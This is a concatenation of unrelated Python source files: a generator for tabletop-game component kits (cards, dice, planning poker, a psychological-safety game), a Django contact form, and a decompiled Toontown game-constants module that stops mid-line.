"editable": True, }) def generate_dice(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Dice (Blue)", "label": "Dice (Blue)", "label_ja": "サイコロ(青)", "width": "64px", "height": "64px" } kit.add_component({ "name": "Dice (Blue)", "handArea": False, "top": "0px", "left": "0px", "height": "64px", "width": "64px", "showImage": False, "draggable": True, "flippable": False, "resizable": False, "rollable": True, "ownable": False, "onAdd": "function(component) { \n" " component.rollFinalValue = Math.floor(Math.random() * 6) + 1;\n" " component.rollDuration = 500;\n" " component.startRoll = true;\n" "}" }) def generate_playing_card(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Playing Card", "label": "Playing Card", "label_ja": "トランプ", "width": "400px", "height": "150px" } box = kit.box({ "name": "Playing Card Box", "handArea": False, "top": "0px", "left": "0px", "height": "200px", "width": "250px", "color": "blue", "showImage": False, "draggable": True, "flippable": False, "resizable": False, "rollable": False, "ownable": False, "traylike": True, "boxOfComponents": True, "cardistry": ["spread out", "collect", "shuffle", 'flip all'], "zIndex": 1, }) template = { "height": "100px", "width": "75px", "showImage": True, "faceupImage": "/static/images/playing_card_up.png", "facedownImage": "/static/images/playing_card_back.png", "facedownText": "", "faceup": False, "draggable": True, "flippable": True, "ownable": True, "resizable": False, } z_index = 100 offset = 0 for suit, prefix, color in [("♠", "S", "black"), ("♥", "H", "red"), ("♦", "D", "red"), ("♣", "C", "black")]: for rank in ["A", "K", "Q", "J", "10", "9", "8", "7", "6", "5", "4", "3", "2"]: card = { "name": f"PlayingCard {prefix}_{rank}", "top": f"{offset}px", "left": f"{offset + 100}px", "textColor": color, "faceupText": f"{suit}{rank}", "zIndex": z_index, } box.add_component(card, template=template) z_index -= 1 offset += 1 for i in range(2): card = { "name": f"JOKER{i + 1}", "top": f"{offset}px", "left": f"{offset + 100}px", "textColor": "black", "faceupText": "JOKER", "zIndex": z_index, } card.update(template) box.add_component(card, template=template) z_index -= 1 offset += 1 kit.add_component({ "name": "Stowage for Unused Cards", "handArea": False, "top": "0px", "left": "300px", "height": "150px", "width": "150px", "text": "Place cards you don't need now here", "text_ja": "使わないカード置き場", "color": "darkgrey", "showImage": False, "draggable": True, "flippable": False, "resizable": True, "rollable": False, "ownable": False, "traylike": True, "stowage": True, "boxOfComponents": False, "zIndex": 1, }) def generate_psychological_safety_game(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Psychological Safety Game", "label": "Psychological Safety Game", "label_ja": "心理的安全性ゲーム", "width": "550px", "height": "750px" } template = { "height": "120px", "width": "83px", "showImage": True, "faceup": False, "draggable": True, "flippable": True, "ownable": True, "resizable": False, } z_index = 100 offset = 0 voice_card_box = kit.box() for voice in range(35): card = { "name": f"PsychologicalSafety V{voice + 1:02}", "top": f"{offset}px", "left": f"{offset + 100}px", "faceupImage": f"/static/images/psychological_safety_v{voice + 1:02}.jpg", "facedownImage": "/static/images/psychological_safety_voice_back.png", "zIndex": z_index, } voice_card_box.add_component(card, template=template) z_index -= 1 offset += 1 offset = 0 situation_card_box = kit.box() for situation in range(14): card = { "name": f"PsychologicalSafety S{situation + 1:02}", "top": f"{offset}px", "left": f"{offset + 100}px", "faceupImage": f"/static/images/psychological_safety_s{situation + 1:02}.jpg", "facedownImage": "/static/images/psychological_safety_situation_back.png", "zIndex": z_index, } situation_card_box.add_component(card, template=template) z_index -= 1 offset += 1 kit.add_component({ "name": "PsychologicalSafety Board", "top": "0", "left": "0", "height": "500px", "width": "354px", "showImage": True, "image": "/static/images/psychological_safety_board.png", "draggable": True, "flippable": False, "ownable": False, "resizable": True, "traylike": True, "zIndex": 0, }) z_index -= 1 voice_card_box.box_component = { "name": "PsychologicalSafety Box for Voice", "handArea": False, "top": "0px", "left": "380px", "height": "200px", "width": "350px", "color": "yellow", "text": "Situation Cards", "text_ja": "発言&オプションカード", "textColor": "black", "textAlign": "center bottom", "showImage": False, "draggable": True, "flippable": False, "resizable": False, "rollable": False, "ownable": False, "traylike": True, "boxOfComponents": True, "cardistry": ['spread out', 'collect', 'shuffle', 'flip all'], "zIndex": 0, } z_index -= 1 situation_card_box.box_component = { "name": "PsychologicalSafety Box for Situation", "handArea": False, "top": "220px", "left": "380", "height": "150px", "width": "350px", "color": "green", "text": "Situation Cards", "text_ja": "状況カード", "textColor": "black", "textAlign": "center bottom", "showImage": False, "draggable": True, "flippable": False, "resizable": False, "rollable": False, "ownable": False, "traylike": True, "boxOfComponents": True, "cardistry": ['spread out', 'collect', 'shuffle', 'flip all'], "zIndex": 0, } z_index -= 1 kit.box({ "name": "PsychologicalSafety Box for Stones", "handArea": False, "top": "390px", "left": "380px", "height": "150px", "width": "250px", "color": "black", "text": "Stones", "text_ja": "石の置き場", "textColor": "white", "textAlign": "center bottom", "showImage": False, "draggable": True, "flippable": False, "resizable": False, "rollable": False, "ownable": False, "traylike": False, "boxOfComponents": True, "cardistry": ['collect in mess'], "positionOfBoxContents": "random", "zIndex": 0, }).use_components( [f"Transparent Stone {stone + 1:02}" for stone in range(4)] * 8 ) z_index -= 1 def generate_coin(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Coin - Tetradrachm of Athens", "label": "Coin", "label_ja": "コイン", "width": "100px", "height": "100px" } kit.add_component({ "name": "Coin - Tetradrachm of Athens", "top": "0px", "left": "0px", "height": "80px", "width": "80px", "faceupImage": "/static/images/coin_TetradrachmOfAthens_head.png", "facedownImage": "/static/images/coin_TetradrachmOfAthens_tail.png", "showImage": True, "draggable": True, "flippable": True, "ownable": False, "resizable": True, }) def generate_counter(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Counter", "label": "Counter", "label_ja": "カウンター", "width": "192px", "height": "96px" } kit.add_component({ "name": "Counter", "text": "Counter", "text_ja": "カウンター", "top": "0px", "left": "0px", "width": "192px", "height": "96px", "showImage": False, "draggable": True, "flippable": False, "ownable": True, "resizable": True, "counter": True, }) def generate_stones(reg: ComponentRegistry): template = { "height": "25px", "width": "25px", "showImage": True, "faceup": False, "draggable": True, "flippable": False, "ownable": True, "resizable": False, } kit = reg.kit() kit.description = { "name": "Transparent Stones", "label": "Transparent Stones", "label_ja": "宝石(セット)", "positionOfKitContents": "random", "width": "100px", "height": "100px" } offset = 0 for stone in range(4): s = { "name": f"Transparent Stone {stone + 1:02}", "top": f"{offset}px", "left": f"{offset + 100}px", "image": f"/static/images/transparent_stone_{stone + 1:02}.png", } kit.add_component(s, template) offset += 1 def generate_planning_poker(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Planning Poker", "label": "Planning Poker", "label_ja": "プランニングポーカー", "positionOfKitContents": "on all hand areas", "width": "400px", "height": "150px" } template = { "height": "40x", "width": "30px", "color": "bisque", "textColor": "black", "showImage": False, "facedownText": "Planning Poker", "faceup": True, "draggable": True, "flippable": True, "ownable": True, "resizable": False, } z_index = 100 offset = 0 for point in ["0", "1/2", "1", "2", "3", "5", "8", "13", "20", "40", "100", "∞", "?", "\u2615"]: card = { "name": f"PlanningPoker {point}", "top": f"{offset}px", "left": f"{offset + 100}px", "faceupText": f"{point}", "zIndex": z_index, } kit.add_component(card, template=template) z_index -= 1 offset += 1 def generate_diamong_game(reg: ComponentRegistry): kit = reg.kit() kit.description = { "name": "Diamond Game", "label": "Chinese Checker", "label_ja": "ダイヤモンドゲーム", "width": "638px", "height": "553px" } kit.add_component({ "name": "Diamond Game Board", "handArea": False, "top": "0", "left": "0", "height": "638px", "width": "553px", "showImage": True, "image": "/static/images/diamond_game_board.png", "draggable": False, "flippable": False, "resizable": False, "rollable": False, "ownable": False, "traylike": True, "boxOfComponents": False, "zIndex": 1, }) template = { "height": "38x", "width": "27px", "showImage": True, "image": "/static/images/piece_A_red.png", "draggable": True, "flippable": False, "ownable": False, "resizable": False, "zIndex": 2, } INTERVAL_W = 40 INTERVAL_H = math.sqrt(3) * (INTERVAL_W / 2) for i in range(5): for j in range(5 - i): piece = { "name": f"piece red{i}-{j}", "top": f"{151 + i * INTERVAL_H}px", "left": f"{22 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px", } if i == j == 0: piece["name"] = "piece red king" piece["image"] = "/static/images/piece_A_red_king.png", piece["height"] = "52px" kit.add_component(piece, template) template.update({ "image": "/static/images/piece_A_yellow.png", }) for i in range(5): for j in range(5 - i): piece = { "name": f"piece yellow{i}-{j}", "top": f"{151 + i * INTERVAL_H}px", "left": f"{342 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px", } if i == 0 and j == 4: piece["name"] = "piece yellow king" piece["image"] = "/static/images/piece_A_yellow_king.png", piece["height"] = "52px" kit.add_component(piece, template) template.update({ "image": "/static/images/piece_A_green.png", }) for i in range(5): for j in range(5 - i): piece = { "name": f"piece green{i}-{j}", "top": f"{433 + i * INTERVAL_H}px", "left": f"{181 + j * INTERVAL_W + (i * INTERVAL_W) / 2}px", } if i == 4: piece["name"] = "piece green king" piece["image"] = "/static/images/piece_A_green_king.png", piece["height"] = "52px" kit.add_component(piece, template) def write_default_table_json(): table = OrderedDict( components=OrderedDict(), kits=[], players=OrderedDict(), tablename="dummy" ) table["components"]["title"] = { "name": "title", "top": "20px", "left": "20px", "width": "300px", "height": "40px", "text": "Welcome to a new table!", "text_ja": "新しいテーブルへようこそ!", "color": "blue", "draggable": True, "flippable": False, "ownable": False, "resizable": True, "showImage": False, "zIndex": 1, } table["components"]["usage"] = { "name": "usage", "top": "20px", "left": "340px", "height": "250px", "width": "400px", "color": "darkgoldenrod", "showImage": False, "faceupText": "- Use Add / Remove Kits (to the left) have components on the table\n - Drag to move\n - Double click to flip\n - Drag the table to scroll\n - Share URL to invite people\n - Add Hand Area (to the left) to have your own cards (hand)\n - Cards in your hand won't be seen by others\n - Enjoy! but you might encounter some issues... Please let us know when you see one", "faceupText_ja": " - 左の「テーブルに出す」からトランプなどを取り出す\n - ドラッグで移動\n - ダブルクリックで裏返す\n - テーブルをドラッグしてスクロール\n - URLをシェアすれば招待できる\n - 左の「手札エリアを作る」で自分の手札エリアを作る\n - 手札エリアに置いたカードは自分のものになり 表にしても見えない\n - まだ不具合や未実装の部分があります。気になる点はお知らせください", "facedownText": "How to use (double click to read)", "facedownText_ja": "使い方 (ダブルクリックしてね)", "draggable": True, "flippable": True, "ownable": False, "resizable": True, "zIndex": 2, } with open("store/default_table.json", "w", encoding="utf-8") as f: json.dump(table, f, indent=2) def write_initial_deploy_data_json(): registry = ComponentRegistry() generate_toolbox(registry) generate_note(registry) generate_dice(registry) generate_playing_card(registry) generate_psychological_safety_game(registry) generate_coin(registry) generate_counter(registry) generate_stones(registry) generate_planning_poker(registry) generate_diamong_game(registry) with open("initial_deploy_data.json", "w", encoding="utf-8") as f: json.dump(registry.build_data_for_deploy(), f, indent=2) if __name__ == "__main__": write_default_table_json() write_initial_deploy_data_json()
from django import forms from crispy_forms.helper import FormHelper from crispy_forms.layout import Submit from django.core.mail import send_mail class ContactForm(forms.Form): name = forms.CharField(required=True) email = forms.EmailField(required=True) content = forms.CharField( required=True, widget=forms.Textarea ) def send_email(self): return send_mail('New Contact Message', self.cleaned_data['content'], self.cleaned_data['email'], ['[email protected]',]) def __init__(self, *args, **kwargs): super(ContactForm, self).__init__(*args, **kwargs) self.helper = FormHelper() self.helper.form_id = 'id-contact-form' self.helper.form_method = 'post' self.helper.add_input(Submit('submit', 'Submit'))
# uncompyle6 version 3.3.2 # Python bytecode 2.4 (62061) # Decompiled from: Python 2.7.15 (v2.7.15:ca079a3ea3, Apr 30 2018, 16:30:26) [MSC v.1500 64 bit (AMD64)] # Embedded file name: toontown.toonbase.ToontownGlobals import TTLocalizer from otp.otpbase.OTPGlobals import * from direct.showbase.PythonUtil import Enum, invertDict from pandac.PandaModules import BitMask32, Vec4 AccountDatabaseChannelId = 4008 ToonDatabaseChannelId = 4021 DoodleDatabaseChannelId = 4023 DefaultDatabaseChannelId = AccountDatabaseChannelId DatabaseIdFromClassName = {'Account': AccountDatabaseChannelId} CogHQCameraFov = 60.0 BossBattleCameraFov = 72.0 MakeAToonCameraFov = 35.0 PieBitmask = BitMask32(256) PetBitmask = BitMask32(8) CatchGameBitmask = BitMask32(16) CashbotBossObjectBitmask = BitMask32(16) FurnitureSideBitmask = BitMask32(32) FurnitureTopBitmask = BitMask32(64) FurnitureDragBitmask = BitMask32(128) PetLookatPetBitmask = BitMask32(256) PetLookatNonPetBitmask = BitMask32(512) FullPies = 65535 CogHQCameraFar = 900.0 CogHQCameraNear = 1.0 CashbotHQCameraFar = 2000.0 CashbotHQCameraNear = 1.0 LawbotHQCameraFar = 3000.0 LawbotHQCameraNear = 1.0 SpeedwayCameraFar = 8000.0 SpeedwayCameraNear = 1.0 MaxMailboxContents = 20 MaxHouseItems = 30 ExtraDeletedItems = 5 DeletedItemLifetime = 7 * 24 * 60 CatalogNumWeeksPerSeries = 13 CatalogNumWeeks = 78 PetFloorCollPriority = 5 PetPanelProximityPriority = 6 P_WillNotFit = -13 P_NotAGift = -12 P_OnOrderListFull = -11 P_MailboxFull = -10 P_NoPurchaseMethod = -9 P_ReachedPurchaseLimit = -8 P_NoRoomForItem = -7 P_NotShopping = -6 P_NotAtMailbox = -5 P_NotInCatalog = -4 P_NotEnoughMoney = -3 P_InvalidIndex = -2 P_UserCancelled = -1 P_ItemAvailable = 1 P_ItemOnOrder = 2 P_ItemUnneeded = 3 GIFT_user = 0 GIFT_admin = 1 GIFT_RAT = 2 GIFT_mobile = 3 GIFT_cogs = 4 FM_InvalidItem = -7 FM_NondeletableItem = -6 FM_InvalidIndex = -5 FM_NotOwner = -4 FM_NotDirector = -3 FM_RoomFull = -2 FM_HouseFull = -1 FM_MovedItem = 1 FM_SwappedItem = 2 FM_DeletedItem = 3 FM_RecoveredItem = 4 SPDonaldsBoat = 3 SPMinniesPiano = 4 CEVirtual = 14 MaxHpLimit = 129 MaxCarryLimit = 80 MaxQuestCarryLimit = 4 MaxCogSuitLevel = 50 - 1 CogSuitHPLevels = ( 15 - 1, 20 - 1, 30 - 1, 40 - 1, 50 - 1) setInterfaceFont(TTLocalizer.InterfaceFont) setSignFont(TTLocalizer.SignFont) from toontown.toontowngui import TTDialog setDialogClasses(TTDialog.TTDialog, TTDialog.TTGlobalDialog) ToonFont = None BuildingNametagFont = None MinnieFont = None SuitFont = None def getToonFont(): global ToonFont if ToonFont == None: ToonFont = loader.loadFont(TTLocalizer.ToonFont, lineHeight=1.0) return ToonFont def getBuildingNametagFont(): global BuildingNametagFont if BuildingNametagFont == None: BuildingNametagFont = loader.loadFont(TTLocalizer.BuildingNametagFont) return BuildingNametagFont def getMinnieFont(): global MinnieFont if MinnieFont == None: MinnieFont = loader.loadFont(TTLocalizer.MinnieFont) return MinnieFont def getSuitFont(): global SuitFont if SuitFont == None: SuitFont = loader.loadFont(TTLocalizer.SuitFont, pixelsPerUnit=40, spaceAdvance=0.25, lineHeight=1.0) return SuitFont DonaldsDock = 1000 ToontownCentral = 2000 TheBrrrgh = 3000 MinniesMelodyland = 4000 DaisyGardens = 5000 ConstructionZone = 6000 FunnyFarm = 7000 GoofySpeedway = 8000 DonaldsDreamland = 9000 BarnacleBoulevard = 1100 SeaweedStreet = 1200 LighthouseLane = 1300 SillyStreet = 2100 LoopyLane = 2200 PunchlinePlace = 2300 WalrusWay = 3100 SleetStreet = 3200 PolarPlace = 3300 AltoAvenue = 4100 BaritoneBoulevard = 4200 TenorTerrace = 4300 ElmStreet = 5100 MapleStreet = 5200 OakStreet = 5300 LullabyLane = 9100 PajamaPlace = 9200 HoodHierarchy = {ToontownCentral: (SillyStreet, LoopyLane, PunchlinePlace), DonaldsDock: (BarnacleBoulevard, SeaweedStreet, LighthouseLane), TheBrrrgh: (WalrusWay, SleetStreet, PolarPlace), MinniesMelodyland: (AltoAvenue, BaritoneBoulevard, TenorTerrace), DaisyGardens: (ElmStreet, MapleStreet, OakStreet), DonaldsDreamland: (LullabyLane, PajamaPlace), GoofySpeedway: ()} WelcomeValleyToken = 0 BossbotHQ = 10000 BossbotLobby = 10100 SellbotHQ = 11000 SellbotLobby = 11100 SellbotFactoryExt = 11200 SellbotFactoryInt = 11500 CashbotHQ = 12000 CashbotLobby = 12100 CashbotMintIntA = 12500 CashbotMintIntB = 12600 CashbotMintIntC = 12700 LawbotHQ = 13000 LawbotLobby = 13100 LawbotOfficeExt = 13200 LawbotOfficeInt = 13300 LawbotStageIntA = 13300 LawbotStageIntB = 13400 LawbotStageIntC = 13500 LawbotStageIntD = 13600 Tutorial = 15000 MyEstate = 16000 WelcomeValleyBegin = 22000 WelcomeValleyEnd = 61000 DynamicZonesBegin = 61000 DynamicZonesEnd = 1 << 20 cogDept2index = {'c': 0, 'l': 1, 'm': 2, 's': 3} cogIndex2dept = invertDict(cogDept2index) HQToSafezone = {SellbotHQ: DaisyGardens, CashbotHQ: DonaldsDreamland, LawbotHQ: TheBrrrgh, BossbotHQ: DonaldsDock} CogDeptNames = [ TTLocalizer.Bossbot, TTLocalizer.Lawbot, TTLocalizer.Cashbot, TTLocalizer.Sellbot] def cogHQZoneId2deptIndex(zone): if zone >= 13000: return zone <= 13999 and 1 else: if zone >= 12000: return 2 else: if zone >= 11000: return 3 else: return 0 def cogHQZoneId2dept(zone): return cogIndex2dept[cogHQZoneId2deptIndex(zone)] def dept2cogHQ(dept): dept2hq = {'c': BossbotHQ, 'l': LawbotHQ, 'm': CashbotHQ, 's': SellbotHQ} return dept2hq[dept] MockupFactoryId = 0 MintNumFloors = {CashbotMintIntA: 20, CashbotMintIntB: 20, CashbotMintIntC: 20} CashbotMintCogLevel = 10 CashbotMintSkelecogLevel = 11 CashbotMintBossLevel = 12 MintNumBattles = {CashbotMintIntA: 4, CashbotMintIntB: 6, CashbotMintIntC: 8} MintCogBuckRewards = {CashbotMintIntA: 8, CashbotMintIntB: 14, CashbotMintIntC: 20} MintNumRooms = {CashbotMintIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), CashbotMintIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), CashbotMintIntC: 4 * (10,) + 10 * (11,) + 6 * (12,)} LawbotStageCogLevel = 10 LawbotStageSkelecogLevel = 11 LawbotStageBossLevel = 12 StageNumBattles = {LawbotStageIntA: 0, LawbotStageIntB: 0, LawbotStageIntC: 0, LawbotStageIntD: 0} StageNoticeRewards = {LawbotStageIntA: 75, LawbotStageIntB: 150, LawbotStageIntC: 225, LawbotStageIntD: 300} StageNumRooms = {LawbotStageIntA: 2 * (6,) + 5 * (7,) + 5 * (8,) + 5 * (9,) + 3 * (10,), LawbotStageIntB: 3 * (8,) + 6 * (9,) + 6 * (10,) + 5 * (11,), LawbotStageIntC: 4 * (10,) + 10 * (11,) + 6 * (12,), LawbotStageIntD: 4 * (10,) + 10 * (11,) + 6 * (12,)} FT_FullSuit = 'fullSuit' FT_Leg = 'leg' FT_Arm = 'arm' FT_Torso = 'torso' factoryId2factoryType = {MockupFactoryId: FT_FullSuit, SellbotFactoryInt: FT_FullSuit, LawbotOfficeInt: FT_FullSuit} StreetNames = TTLocalizer.GlobalStreetNames StreetBranchZones = StreetNames.keys() Hoods = ( DonaldsDock, ToontownCentral, TheBrrrgh, MinniesMelodyland, DaisyGardens, ConstructionZone, FunnyFarm, GoofySpeedway, DonaldsDreamland, BossbotHQ, SellbotHQ, CashbotHQ, LawbotHQ) NoPreviousGameId = 0 RaceGameId = 1 CannonGameId = 2 TagGameId = 3 PatternGameId = 4 RingGameId = 5 MazeGameId = 6 TugOfWarGameId = 7 CatchGameId = 8 DivingGameId = 9 TargetGameId = 10 PairingGameId = 11 VineGameId = 12 TravelGameId = 100 MinigameNames = {'race': RaceGameId, 'cannon': CannonGameId, 'tag': TagGameId, 'pattern': PatternGameId, 'minnie': PatternGameId, 'match': PatternGameId, 'matching': PatternGameId, 'ring': RingGameId, 'maze': MazeGameId, 'tug': TugOfWarGameId, 'catch': CatchGameId, 'diving': DivingGameId, 'target': TargetGameId, 'pairing': PairingGameId, 'vine': VineGameId, 'travel': TravelGameId} MinigameTemplateId = -1 MinigameIDs = ( RaceGameId, CannonGameId, TagGameId, PatternGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId, TravelGameId) MinigamePlayerMatrix = {1: (CannonGameId, RingGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 2: (CannonGameId, PatternGameId, RingGameId, TagGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 3: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId), 4: (CannonGameId, PatternGameId, RingGameId, TagGameId, RaceGameId, MazeGameId, TugOfWarGameId, CatchGameId, DivingGameId, TargetGameId, PairingGameId, VineGameId)} KeyboardTimeout = 300 phaseMap = {Tutorial: 4, ToontownCentral: 4, MyEstate: 5.5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11} streetPhaseMap = {ToontownCentral: 5, DonaldsDock: 6, MinniesMelodyland: 6, GoofySpeedway: 6, TheBrrrgh: 8, DaisyGardens: 8, FunnyFarm: 8, DonaldsDreamland: 8, ConstructionZone: 8, BossbotHQ: 9, SellbotHQ: 9, CashbotHQ: 10, LawbotHQ: 11} dnaMap = {Tutorial: 'toontown_central', ToontownCentral: 'toontown_central', DonaldsDock: 'donalds_dock', MinniesMelodyland: 'minnies_melody_land', GoofySpeedway: 'goofy_speedway', TheBrrrgh: 'the_burrrgh', DaisyGardens: 'daisys_garden', FunnyFarm: 'not done yet', DonaldsDreamland: 'donalds_dreamland', ConstructionZone: 'not done yet', BossbotHQ: 'cog_hq_bossbot', SellbotHQ: 'cog_hq_sellbot', CashbotHQ: 'cog_hq_cashbot', LawbotHQ: 'cog_hq_lawbot'} hoodNameMap = {DonaldsDock: TTLocalizer.DonaldsDock, ToontownCentral: TTLocalizer.ToontownCentral, TheBrrrgh: TTLocalizer.TheBrrrgh, MinniesMelodyland: TTLocalizer.MinniesMelodyland, DaisyGardens: TTLocalizer.DaisyGardens, ConstructionZone: TTLocalizer.ConstructionZone, FunnyFarm: TTLocalizer.FunnyFarm, GoofySpeedway: TTLocalizer.GoofySpeedway, DonaldsDreamland: TTLocalizer.DonaldsDreamland, BossbotHQ: TTLocalizer.BossbotHQ, SellbotHQ: TTLocalizer.SellbotHQ, CashbotHQ: TTLocalizer.CashbotHQ, LawbotHQ: TTLocalizer.LawbotHQ, Tutorial: TTLocalizer.Tutorial, MyEstate: TTLocalizer.MyEstate} safeZoneCountMap = {MyEstate: 8, Tutorial: 6, ToontownCentral: 6, DonaldsDock: 10, MinniesMelodyland: 5, GoofySpeedway: 500, TheBrrrgh: 8, DaisyGardens: 9, FunnyFarm: 500, DonaldsDreamland: 5, ConstructionZone: 500} townCountMap = {MyEstate: 8, Tutorial: 40, ToontownCentral: 37, DonaldsDock: 40, MinniesMelodyland: 40, GoofySpeedway: 40, TheBrrrgh: 40, DaisyGardens: 40, FunnyFarm: 40, DonaldsDreamland: 40, ConstructionZone: 40} hoodCountMap = {MyEstate: 2, Tutorial: 2, ToontownCentral: 2, DonaldsDock: 2, MinniesMelodyland: 2, GoofySpeedway: 2, TheBrrrgh: 2, DaisyGardens: 2, FunnyFarm: 2, DonaldsDreamland: 2, ConstructionZone: 2, BossbotHQ: 2, SellbotHQ: 43, CashbotHQ: 2, LawbotHQ: 2} TrophyStarLevels = ( 10, 20, 30, 50, 75, 100) TrophyStarColors = ( Vec4(0.9, 0.6, 0.2, 1), Vec4(0.9, 0.6, 0.2, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(0.8, 0.8, 0.8, 1), Vec4(1, 1, 0, 1), Vec4(1, 1, 0, 1)) MickeySpeed = 5.0 MinnieSpeed = 3.2 DonaldSpeed = 3.68 DaisySpeed = 2.3 GoofySpeed = 5.2 PlutoSpeed = 5.5 SuitWalkSpeed = 4.8 PieCodeBossCog = 1 PieCodeNotBossCog = 2 PieCodeToon = 3 PieCodeBossInsides = 4 PieCodeDefensePan = 5 PieCodeProsecutionPan = 6 PieCodeLawyer = 7 PieCodeColors = {PieCodeBossCog: None, PieCodeNotBossCog: (0.8, 0.8, 0.8, 1), PieCodeToon: None} BossCogRollSpeed = 7.5 BossCogTurnSpeed = 20 BossCogTreadSpeed = 3.5 BossCogDizzy = 0 BossCogElectricFence = 1 BossCogSwatLeft = 2 BossCogSwatRight = 3 BossCogAreaAttack = 4 BossCogFrontAttack = 5 BossCogRecoverDizzyAttack = 6 BossCogDirectedAttack = 7 BossCogStrafeAttack = 8 BossCogNoAttack = 9 BossCogGoonZap = 10 BossCogSlowDirectedAttack = 11 BossCogDizzyNow = 12 BossCogGavelStomp = 13 BossCogGavelHandle = 14 BossCogLawyerAttack = 15 BossCogAttackTimes = {BossCogElectricFence: 0, BossCogSwatLeft: 5.5, BossCogSwatRight: 5.5, BossCogAreaAttack: 4.21, BossCogFrontAttack: 2.65, BossCogRecoverDizzyAttack: 5.1, BossCogDirectedAttack: 4.84, BossCogNoAttack: 6, BossCogSlowDirectedAttack: 7.84} BossCogDamageLevels = {BossCogElectricFence: 1, BossCogSwatLeft: 5, BossCogSwatRight: 5, BossCogAreaAttack: 10, BossCogFrontAttack: 3, BossCogRecoverDizzyAttack: 3, BossCogDirectedAttack: 3, BossCogStrafeAttack: 2, BossCogGoonZap: 5, BossCogSlowDirectedAttack: 10, BossCogGavelStomp: 20, BossCogGavelHandle: 2, BossCogLawyerAttack: 5} BossCogBattleAPosHpr = ( 0, -25, 0, 0, 0, 0) BossCogBattleBPosHpr = (0, 25, 0, 180, 0, 0) SellbotBossMaxDamage = 100 SellbotBossBattleOnePosHpr = ( 0, -35, 0, -90, 0, 0) SellbotBossBattleTwoPosHpr = (0, 60, 18, -90, 0, 0) SellbotBossBattleThreeHpr = (180, 0, 0) SellbotBossBottomPos = (0, -110, -6.5) SellbotBossDeathPos = (0, -175, -6.5) SellbotBossDooberTurnPosA = ( -20, -50, 0) SellbotBossDooberTurnPosB = (20, -50, 0) SellbotBossDooberTurnPosDown = (0, -50, 0) SellbotBossDooberFlyPos = (0, -135, -6.5) SellbotBossTopRampPosA = ( -80, -35, 18) SellbotBossTopRampTurnPosA = (-80, 10, 18) SellbotBossP3PosA = (-50, 40, 18) SellbotBossTopRampPosB = (80, -35, 18) SellbotBossTopRampTurnPosB = (80, 10, 18) SellbotBossP3PosB = (50, 60, 18) CashbotBossMaxDamage = 500 CashbotBossOffstagePosHpr = ( 120, -195, 0, 0, 0, 0) CashbotBossBattleOnePosHpr = (120, -230, 0, 90, 0, 0) CashbotRTBattleOneStartPosHpr = (94, -220, 0, 110, 0, 0) CashbotBossBattleThreePosHpr = (120, -315, 0, 180, 0, 0) CashbotToonsBattleThreeStartPosHpr = [ ( 105, -285, 0, 208, 0, 0), (136, -342, 0, 398, 0, 0), (105, -342, 0, 333, 0, 0), (135, -292, 0, 146, 0, 0), (93, -303, 0, 242, 0, 0), (144, -327, 0, 64, 0, 0), (145, -302, 0, 117, 0, 0), (93, -327, 0, -65, 0, 0)] CashbotBossSafePosHprs = [ ( 120, -315, 30, 0, 0, 0), (77.2, -329.3, 0, -90, 0, 0), (77.1, -302.7, 0, -90, 0, 0), (165.7, -326.4, 0, 90, 0, 0), (165.5, -302.4, 0, 90, 0, 0), (107.8, -359.1, 0, 0, 0, 0), (133.9, -359.1, 0, 0, 0, 0), (107.0, -274.7, 0, 180, 0, 0), (134.2, -274.7, 0, 180, 0, 0)] CashbotBossCranePosHprs = [ ( 97.4, -337.6, 0, -45, 0, 0), (97.4, -292.4, 0, -135, 0, 0), (142.6, -292.4, 0, 135, 0, 0), (142.6, -337.6, 0, 45, 0, 0)] CashbotBossToMagnetTime = 0.2 CashbotBossFromMagnetTime = 1 CashbotBossSafeKnockImpact = 0.5 CashbotBossSafeNewImpact = 0.0 CashbotBossGoonImpact = 0.1 CashbotBossKnockoutDamage = 15 TTWakeWaterHeight = -4.79 DDWakeWaterHeight = 1.669 EstateWakeWaterHeight = -0.3 WakeRunDelta = 0.1 WakeWalkDelta = 0.2 NoItems = 0 NewItems = 1 OldItems = 2 SuitInvasionBegin = 0 SuitInvasionUpdate = 1 SuitInvasionEnd = 2 SuitInvasionBulletin = 3 NO_HOLIDAY = 0 JULY4_FIREWORKS = 1 NEWYEARS_FIREWORKS = 2 HALLOWEEN = 3 WINTER_DECORATIONS = 4 SKELECOG_INVASION = 5 MR_HOLLYWOOD_INVASION = 6 FISH_BINGO_NIGHT = 7 ELECTION_PROMOTION = 8 BLACK_CAT_DAY = 9 RESISTANCE_EVENT = 10 KART_RECORD_DAILY_RESET = 11 KART_RECORD_WEEKLY_RESET = 12 TRICK_OR_TREAT = 13 CIRCUIT_RACING = 14 POLAR_PLACE_EVENT = 15 CIRCUIT_RACING_EVENT = 16 TROLLEY_HOLIDAY = 17 TROLLEY_WEEKEND = 18 JULY22_FIREWORKS = 201 JULY23_FIREWORKS = 202 JULY25_FIREWORKS = 203 JULY30_FIREWORKS = 204 JULY31_FIREWORKS = 205 AUGUST1_FIREWORKS = 206 AUGUST3_FIREWORKS = 207 AUGUST5_FIREWORKS = 208 AUGUST7_FIREWORKS = 209 AUGUST8_FIREWORKS = 210 AUGUST10_FIREWORKS = 211 AUGUST13_FIREWORKS = 212 AUGUST14_FIREWORKS = 213 AUGUST16_FIREWORKS = 